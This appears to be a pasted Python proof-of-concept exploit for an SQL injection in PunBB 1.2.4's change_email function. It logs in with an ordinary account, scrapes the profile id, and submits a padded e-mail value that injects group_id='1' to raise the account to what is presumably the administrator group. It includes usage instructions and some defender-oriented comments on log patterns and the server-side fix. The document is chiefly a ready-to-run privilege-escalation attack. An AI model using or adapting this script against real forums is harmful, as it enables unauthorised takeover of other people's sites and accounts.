Paste #709
Posted by: rega
Posted on: 2026-07-02 16:56:07
#!/usr/bin/env python3
import requests
import sys
import re
from urllib.parse import urljoin
class Colors:
    """ANSI SGR escape sequences used to colour the script's console output.

    Each attribute is a plain string that is concatenated around a message;
    ``RESET`` returns the terminal to its default rendition.
    """

    # Text attributes
    BOLD = '\033[1m'
    RESET = '\033[0m'

    # Bright foreground colours
    RED = '\033[91m'
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    BLUE = '\033[94m'
    CYAN = '\033[96m'
def banner():
    """Print the tool's title box in bold cyan, then reset the terminal colour.

    The box names the target the script was written for (PunBB 1.2.4,
    ``change_email`` SQL injection) and its author's site.
    """
    box_lines = (
        "",  # the banner starts with a blank line
        "╔══════════════════════════════════════════════════════════════╗",
        "║ PunBB 1.2.4 - change_email SQL Injection ║",
        "║ ║",
        "║ by www.downgrade-net.ru ║",
        "╚══════════════════════════════════════════════════════════════╝",
        "",  # ...and ends with a newline before the colour reset
    )
    box = "\n".join(box_lines)
    print(Colors.BOLD + Colors.CYAN + box + Colors.RESET)
def success(msg):
    """Print ``msg`` in green with a ``[+]`` prefix (a step that worked)."""
    line = "".join((Colors.GREEN, "[+] ", msg, Colors.RESET))
    print(line)
def info(msg):
    """Print ``msg`` in blue with a ``[*]`` prefix (progress information)."""
    line = "".join((Colors.BLUE, "[*] ", msg, Colors.RESET))
    print(line)
def warning(msg):
    """Print ``msg`` in yellow with a ``[!]`` prefix (something to look at)."""
    line = "".join((Colors.YELLOW, "[!] ", msg, Colors.RESET))
    print(line)
def error(msg):
    """Print ``msg`` in red with a ``[-]`` prefix (a step that failed)."""
    line = "".join((Colors.RED, "[-] ", msg, Colors.RESET))
    print(line)
def main():
    """Run the proof of concept the banner labels "PunBB 1.2.4 - change_email SQL Injection".

    Reads five positional command-line arguments (base URL, username,
    password, e-mail address, e-mail domain), logs in to the forum with the
    supplied account, reads that account's numeric profile id from the index
    page, and submits a crafted string as the new e-mail address to
    ``profile.php?action=change_email``.

    Exits with status 1 on a usage error, a failed login, or when no profile
    id is found. The script never checks the target's version or the outcome
    of the final request.

    Reading this as a defender: on the server the run shows up as a POST to
    ``/login.php?action=in``, a GET of ``/index.php`` and a POST to
    ``/profile.php?action=change_email&id=<n>`` whose ``req_new_email`` field
    contains double quotes, a single quote, commas, a run of spaces and the
    text ``group_id=``. None of these belong in an ordinary address, so
    request-body logging or a WAF rule on that field is a reasonable
    detection point. The durable fix is server-side: a forum release in which
    the change_email handling is corrected, with the submitted value
    length-checked and bound as a query parameter rather than spliced into
    SQL.
    """
    banner()
    # Five arguments are required; argv[0] is the script name, hence "< 6".
    if len(sys.argv) < 6:
        print(f"Usage: python3 {sys.argv[0]} <url> <username> <password> <email> <email domain>")
        print(f"Example: python3 {sys.argv[0]} http://localhost user password user@domain.com domain.com")
        sys.exit(1)
    url = sys.argv[1].rstrip('/')
    username = sys.argv[2]
    password = sys.argv[3]
    email = sys.argv[4]
    domain = sys.argv[5]
    # One Session so the login cookie is sent on the following requests.
    s = requests.Session()
    info("Logging in as normal user...")
    # Field names of the forum's login form; an existing account is required.
    login_data = {
        'req_username': username,
        'req_password': password,
        'form_sent': '1'
    }
    r = s.post(urljoin(url, "/login.php?action=in"), data=login_data)
    # Login is judged by HTTP 200 plus the literal cookie name "punbb_cookie"
    # appearing in the string form of the response's cookie jar.
    if r.status_code != 200 or "punbb_cookie" not in str(r.cookies):
        error("Login failed!")
        sys.exit(1)
    success("Successfully logged in!")
    info("Extracting user_id...")
    r = s.get(urljoin(url, "/index.php"))
    # First profile.php?id=<digits> link on the index page is taken as the
    # logged-in account's id.
    # NOTE(review): nothing here verifies that this link belongs to the
    # current user rather than another member listed on the page.
    match = re.search(r'profile\.php\?id=(\d+)', r.text)
    if match:
        user_id = match.group(1)
        success(f"User-ID found: {user_id}")
    else:
        error("Could not find user_id!")
        sys.exit(1)
    info("Creating payload...")
    # Builds an address-shaped string: the local part of <email> wrapped in
    # double quotes, "@", the domain part of <email>, then quote and comma
    # characters. email.split("@")[1] raises IndexError if <email> has no "@".
    payload = f'"{email.split("@")[0]}"@{email.split("@")[1]}","\','
    # Column assignment carried inside the "address".
    # NOTE(review): group_id 1 is presumably the forum's administrator
    # group — confirm against the PunBB schema.
    append = "group_id='1"
    # Space padding so that payload + padding + append is 50 characters long.
    # NOTE(review): 50 looks like an assumption about a storage width on the
    # server side — confirm. A negative count yields an empty string.
    padding = " " * (50 - len(append) - len(payload))
    # The trailing '"@<domain>' keeps the whole value looking like
    # local-part@domain to whatever validates it.
    final_email = payload + padding + append + f'"@{domain}'
    info(f"Payload: {final_email[:70]}...")
    success("Sending SQL Injection payload...")
    # Same form fields the forum's own "change e-mail" page submits.
    change_data = {
        'req_new_email': final_email,
        'form_sent': '1'
    }
    r = s.post(urljoin(url, f"/profile.php?action=change_email&id={user_id}"), data=change_data)
    # The banner below is printed unconditionally: the response `r` is never
    # inspected, so this output says nothing about whether the server
    # accepted or rejected the request.
    print(Colors.BOLD + Colors.GREEN + "\n" + "="*65)
    print(" EXPLOIT FINISHED SUCCESSFULLY!")
    print("="*65 + Colors.RESET)
    # Per this message, the change only takes effect once the confirmation
    # link mailed by the forum is followed.
    print(Colors.YELLOW + "Now check your email and click the confirmation link\n" + Colors.RESET)
if __name__ == "__main__":
    # Script entry point. Ctrl-C and any other Exception are reduced to a
    # single red "[-]" line instead of a traceback. SystemExit raised by
    # sys.exit() inside main() is not an Exception subclass, so those exit
    # codes still propagate.
    try:
        main()
    except KeyboardInterrupt:
        error("Interrupted by user")
    except Exception as exc:
        error(f"Error: {exc}")